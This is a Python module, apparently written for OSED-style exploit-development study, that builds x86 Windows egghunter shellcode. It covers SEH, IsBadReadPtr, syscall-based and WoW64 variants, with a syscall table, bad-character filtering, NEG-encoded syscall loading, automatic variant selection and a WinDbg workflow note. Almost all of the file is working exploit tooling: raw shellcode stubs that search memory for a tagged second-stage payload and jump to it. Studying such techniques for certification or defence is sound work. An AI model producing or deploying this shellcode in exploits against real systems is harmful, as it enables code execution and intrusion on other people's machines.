from __future__ import annotations

from dataclasses import dataclass
from pathlib import Path
from typing import Iterable, Literal

HunterKind = Literal[
    "x86_seh",
    "x86_isbadreadptr",
    "x86_ntdisplaystring",
    "x86_ntaccess",
    "x86_wow64_win10_ntaccess",
]


SYSCALL_TABLE = {
    "win10_x86": {
        "NtAccessCheckAndAuditAlarm": 0x1C6,
        "NtDisplayString": 0x43,
    },
    "win11_x86": {
        "NtAccessCheckAndAuditAlarm": 0x1C6,
        "NtDisplayString": 0x43,
    },
    "server2012_x86": {
        "NtAccessCheckAndAuditAlarm": 0x02,
        "NtDisplayString": 0x43,
    },
    "server2016_x86": {
        "NtAccessCheckAndAuditAlarm": 0x1C6,
        "NtDisplayString": 0x43,
    },
    "server2019_x86": {
        "NtAccessCheckAndAuditAlarm": 0x1C6,
        "NtDisplayString": 0x43,
    },
    "server2022_x86": {
        "NtAccessCheckAndAuditAlarm": 0x1C6,
        "NtDisplayString": 0x43,
    },
}


class EgghunterError(Exception):
    """Base error for egghunter generation."""


class UnsupportedHunterError(EgghunterError):
    """Raised when a requested hunter is not implemented."""


class BadCharError(EgghunterError):
    """Raised when generated bytes contain excluded characters."""


class SelectionError(EgghunterError):
    """Raised when no hunter variant satisfies the requested constraints."""


@dataclass(frozen=True, slots=True)
class HunterSpec:
    name: str
    arch: str
    size: int | None
    needs_api_address: bool = False
    needs_syscall_id: bool = False
    notes: str = ""


@dataclass(frozen=True, slots=True)
class BuildResult:
    kind: HunterKind
    tag: bytes
    shellcode: bytes

    @property
    def hex_escaped(self) -> str:
        return to_hex_escaped(self.shellcode)

    @property
    def python_bytes_literal(self) -> str:
        return f'b"{self.hex_escaped}"'

    def write_raw(self, path: str | Path) -> Path:
        return write_raw(path, self.shellcode)


@dataclass(frozen=True, slots=True)
class HunterCandidate:
    name: str
    shellcode: bytes
    size: int
    uses_syscall: bool
    arch: str = "x86"


SPECS: dict[HunterKind, HunterSpec] = {
    "x86_seh": HunterSpec(
        name="SEH egghunter",
        arch="x86",
        size=69,
        notes="Classic SEH-based hunter.",
    ),
    "x86_isbadreadptr": HunterSpec(
        name="IsBadReadPtr egghunter",
        arch="x86",
        size=37,
        needs_api_address=True,
        notes="Requires IsBadReadPtr address from the target process.",
    ),
    "x86_ntdisplaystring": HunterSpec(
        name="NtDisplayString egghunter",
        arch="x86",
        size=None,
        needs_syscall_id=True,
        notes="System-call probe hunter (dynamic syscall loader).",
    ),
    "x86_ntaccess": HunterSpec(
        name="NtAccessCheckAndAuditAlarm egghunter",
        arch="x86",
        size=None,
        needs_syscall_id=True,
        notes="System-call probe hunter (dynamic syscall loader).",
    ),
    "x86_wow64_win10_ntaccess": HunterSpec(
        name="Windows 10 WoW64 egghunter",
        arch="x86 (WoW64)",
        size=45,
        notes="Win10/WoW64-specific syscall path.",
    ),
}


def specs() -> dict[HunterKind, HunterSpec]:
    return dict(SPECS)


def to_hex_escaped(buf: bytes) -> str:
    return "".join(f"\\x{b:02x}" for b in buf)


def write_raw(path: str | Path, data: bytes) -> Path:
    out = Path(path)
    out.write_bytes(data)
    return out


def normalize_badchars(excluded: bytes | Iterable[int]) -> bytes:
    if isinstance(excluded, bytes):
        vals = list(excluded)
    else:
        vals = [int(x) & 0xFF for x in excluded]
    return bytes(sorted(set(vals)))


def validate_tag(tag: bytes) -> None:
    if len(tag) != 4:
        raise EgghunterError("Tag must be exactly 4 bytes")


def validate_badchars(buf: bytes, excluded: bytes | Iterable[int]) -> None:
    badchars = normalize_badchars(excluded)
    hits = sorted(set(buf) & set(badchars))
    if hits:
        rendered = " ".join(f"{b:02x}" for b in hits)
        raise BadCharError(f"Generated hunter contains excluded byte(s): {rendered}")


def build_egg(tag: bytes = b"W00T") -> bytes:
    validate_tag(tag)
    return tag + tag


def build_stage2(tag: bytes, payload: bytes) -> bytes:
    return build_egg(tag) + payload


def resolve_syscall(target: str, name: str) -> int:
    try:
        return SYSCALL_TABLE[target][name]
    except KeyError as exc:
        raise RuntimeError(f"Missing syscall for {target}:{name}") from exc


def encode_syscall(syscall: int, badchars: bytes) -> bytes:
    """
    Load syscall into EAX without badchars.
    Strategy:
    - push/pop if small
    - neg encoding if large
    """
    badchars = normalize_badchars(badchars)

    if syscall <= 0x7F:
        candidate = b"\x6a" + bytes([syscall]) + b"\x58"
        validate_badchars(candidate, badchars)
        return candidate

    neg = (0x100000000 - syscall) & 0xFFFFFFFF
    raw = neg.to_bytes(4, "little", signed=False)
    if any(b in badchars for b in raw):
        raise BadCharError("NEG encoding contains badchars")
    return b"\xB8" + raw + b"\xF7\xD8"


def _pack32(value: int) -> bytes:
    if not (0 <= value <= 0xFFFFFFFF):
        raise EgghunterError("32-bit value out of range")
    return value.to_bytes(4, "little", signed=False)


def hunter_x86_seh(tag: bytes, excluded: bytes = b"") -> bytes:
    validate_tag(tag)
    shellcode = (
        b"\xeb\x21\x59\xb8"
        + tag
        + b"\x51\x6a\xff\x33\xdb\x64\x89\x23\x6a\x02\x59\x8b\xfb\xf3\xaf"
        b"\x75\x07\xff\xe7\x66\x81\xcb\xff\x0f\x43\xeb\xed\xe8\xda\xff"
        b"\xff\xff\x6a\x0c\x59\x8b\x04\x0c\xb1\xb8\x83\x04\x08\x06\x58"
        b"\x83\xc4\x10\x50\x33\xc0\xc3"
    )
    validate_badchars(shellcode, excluded)
    return shellcode


def hunter_x86_isbadreadptr(tag: bytes, isbadreadptr_addr: int, excluded: bytes = b"") -> bytes:
    validate_tag(tag)
    shellcode = (
        b"\x33\xdb\x66\x81\xcb\xff\x0f\x43\x6a\x08\x53\xb8"
        + _pack32(isbadreadptr_addr)
        + b"\xff\xd0\x85\xc0\x75\xec\xb8"
        + tag
        + b"\x8b\xfb\xaf\x75\xe7\xaf\x75\xe4\xff\xe7"
    )
    validate_badchars(shellcode, excluded)
    return shellcode


def hunter_x86_ntaccess(tag: bytes, syscall_id: int, excluded: bytes = b"") -> bytes:
    validate_tag(tag)
    excluded_norm = normalize_badchars(excluded)
    syscall_load = encode_syscall(syscall_id, excluded_norm)

    shellcode = (
        b"\x66\x81\xca\xff\x0f"
        b"\x42"
        b"\x52"
        + syscall_load
        + b"\xcd\x2e"
        b"\x3c\x05"
        b"\x5a"
        b"\x74"
    )

    if len(syscall_load) == 3:
        shellcode += b"\xef"
    elif len(syscall_load) == 7:
        shellcode += b"\xeb"
    else:
        raise EgghunterError("Unexpected syscall loader size")

    shellcode += b"\xb8" + tag + b"\x89\xd7\xaf\x75"
    shellcode += b"\xea" if len(syscall_load) == 3 else b"\xe6"
    shellcode += b"\xaf\x75"
    shellcode += b"\xe7" if len(syscall_load) == 3 else b"\xe3"
    shellcode += b"\xff\xe7"

    validate_badchars(shellcode, excluded_norm)
    return shellcode


def hunter_x86_ntdisplaystring(tag: bytes, syscall_id: int, excluded: bytes = b"") -> bytes:
    return hunter_x86_ntaccess(tag=tag, syscall_id=syscall_id, excluded=excluded)


def hunter_x86_wow64_win10_ntaccess(tag: bytes, excluded: bytes = b"") -> bytes:
    validate_tag(tag)
    shellcode = (
        b"\x33\xd2"
        b"\x66\x81\xca\xff\x0f"
        b"\x33\xdb"
        b"\x42"
        b"\x52"
        b"\x53\x53\x53\x53"
        b"\x6a\x29"
        b"\x58"
        b"\xb3\xc0"
        b"\x64\xff\x13"
        b"\x83\xc4\x10"
        b"\x5a"
        b"\x3c\x05"
        b"\x74\xe3"
        b"\xb8"
        + tag
        + b"\x8b\xfa\xaf\x75\xde\xaf\x75\xdb\xff\xe7"
    )
    validate_badchars(shellcode, excluded)
    return shellcode


def build(
    kind: HunterKind,
    tag: bytes = b"W00T",
    *,
    excluded: bytes | Iterable[int] = b"",
    syscall_id: int | None = None,
    isbadreadptr_addr: int | None = None,
    target: str = "win10_x86",
) -> BuildResult:
    excluded_norm = normalize_badchars(excluded)

    if kind == "x86_seh":
        shellcode = hunter_x86_seh(tag=tag, excluded=excluded_norm)
    elif kind == "x86_isbadreadptr":
        if isbadreadptr_addr is None:
            raise EgghunterError("x86_isbadreadptr requires isbadreadptr_addr")
        shellcode = hunter_x86_isbadreadptr(
            tag=tag,
            isbadreadptr_addr=isbadreadptr_addr,
            excluded=excluded_norm,
        )
    elif kind == "x86_ntdisplaystring":
        sid = resolve_syscall(target, "NtDisplayString") if syscall_id is None else syscall_id
        shellcode = hunter_x86_ntdisplaystring(tag=tag, syscall_id=sid, excluded=excluded_norm)
    elif kind == "x86_ntaccess":
        sid = (
            resolve_syscall(target, "NtAccessCheckAndAuditAlarm")
            if syscall_id is None
            else syscall_id
        )
        shellcode = hunter_x86_ntaccess(tag=tag, syscall_id=sid, excluded=excluded_norm)
    elif kind == "x86_wow64_win10_ntaccess":
        shellcode = hunter_x86_wow64_win10_ntaccess(tag=tag, excluded=excluded_norm)
    else:
        raise UnsupportedHunterError(f"Unsupported hunter kind: {kind}")

    return BuildResult(kind=kind, tag=tag, shellcode=shellcode)


def choose_hunter(
    tag: bytes = b"W00T",
    *,
    excluded: bytes = b"",
    target: str = "win10_x86",
    prefer_seh: bool = False,
    debug: bool = False,
    max_size: int | None = None,
    ntaccess_syscall_id: int | None = None,
    ntdisplaystring_syscall_id: int | None = None,
    isbadreadptr_addr: int | None = None,
    allow_variants: list[str] | None = None,
) -> HunterCandidate:
    excluded_norm = normalize_badchars(excluded)
    errors: list[str] = []

    order: list[str] = ["x86_ntaccess", "x86_ntdisplaystring", "x86_seh"]
    if prefer_seh:
        order = ["x86_seh", "x86_ntaccess", "x86_ntdisplaystring"]

    if isbadreadptr_addr is not None:
        order.insert(0, "x86_isbadreadptr")

    if allow_variants is not None:
        allowed = set(allow_variants)
        order = [name for name in order if name in allowed]

    for variant in order:
        try:
            if variant == "x86_isbadreadptr":
                shellcode = hunter_x86_isbadreadptr(
                    tag=tag,
                    isbadreadptr_addr=isbadreadptr_addr,  # type: ignore[arg-type]
                    excluded=excluded_norm,
                )
                uses_syscall = False
            elif variant == "x86_ntaccess":
                syscall = (
                    resolve_syscall(target, "NtAccessCheckAndAuditAlarm")
                    if ntaccess_syscall_id is None
                    else ntaccess_syscall_id
                )
                shellcode = hunter_x86_ntaccess(tag=tag, syscall_id=syscall, excluded=excluded_norm)
                uses_syscall = True
            elif variant == "x86_ntdisplaystring":
                syscall = (
                    resolve_syscall(target, "NtDisplayString")
                    if ntdisplaystring_syscall_id is None
                    else ntdisplaystring_syscall_id
                )
                shellcode = hunter_x86_ntdisplaystring(tag=tag, syscall_id=syscall, excluded=excluded_norm)
                uses_syscall = True
            elif variant == "x86_seh":
                shellcode = hunter_x86_seh(tag=tag, excluded=excluded_norm)
                uses_syscall = False
            else:
                raise SelectionError(f"Unknown variant: {variant}")

            size = len(shellcode)
            if max_size is not None and size > max_size:
                raise SelectionError(f"size {size} exceeds max_size={max_size}")

            return HunterCandidate(
                name=variant,
                shellcode=shellcode,
                size=size,
                uses_syscall=uses_syscall,
            )
        except Exception as exc:
            if debug:
                print(f"[DEBUG] {variant} failed: {exc}")
            errors.append(f"{variant}: {exc}")

    raise SelectionError("No valid egghunter: " + " | ".join(errors))


def debug_hunter_info(name: str, shellcode: bytes) -> None:
    print(f"[+] Selected: {name}")
    print(f"[+] Size: {len(shellcode)}")
    print(f"[+] Bytes: {shellcode.hex()}")


def exam_workflow_note() -> str:
    return """
[OSED Egghunter Workflow]
1. Find syscall in WinDbg:
   u ntdll!NtAccessCheckAndAuditAlarm
2. Extract:
   mov eax, XXXXh
3. Update table:
   SYSCALL_TABLE["win10_x86"]["NtAccessCheckAndAuditAlarm"] = XXXX
4. Generate hunter:
   python -m Tools.egghunter.emit_hunter
5. Validate in WinDbg:
   u <addr>
   t
   p
6. Confirm:
   - no badchars
   - correct jumps
   - EDI points to W00TW00T
""".strip("\n")


class Egghunters:
    """Backwards-compatible class wrapper around the module API."""

    @classmethod
    def specs(cls) -> dict[HunterKind, HunterSpec]:
        return specs()

    @staticmethod
    def egg(tag: bytes = b"W00T") -> bytes:
        return build_egg(tag)

    @classmethod
    def build(
        cls,
        kind: HunterKind,
        tag: bytes = b"W00T",
        *,
        isbadreadptr_addr: int | None = None,
        excluded: bytes | Iterable[int] = b"",
        syscall_id: int | None = None,
        target: str = "win10_x86",
    ) -> BuildResult:
        return build(
            kind=kind,
            tag=tag,
            excluded=excluded,
            syscall_id=syscall_id,
            isbadreadptr_addr=isbadreadptr_addr,
            target=target,
        )
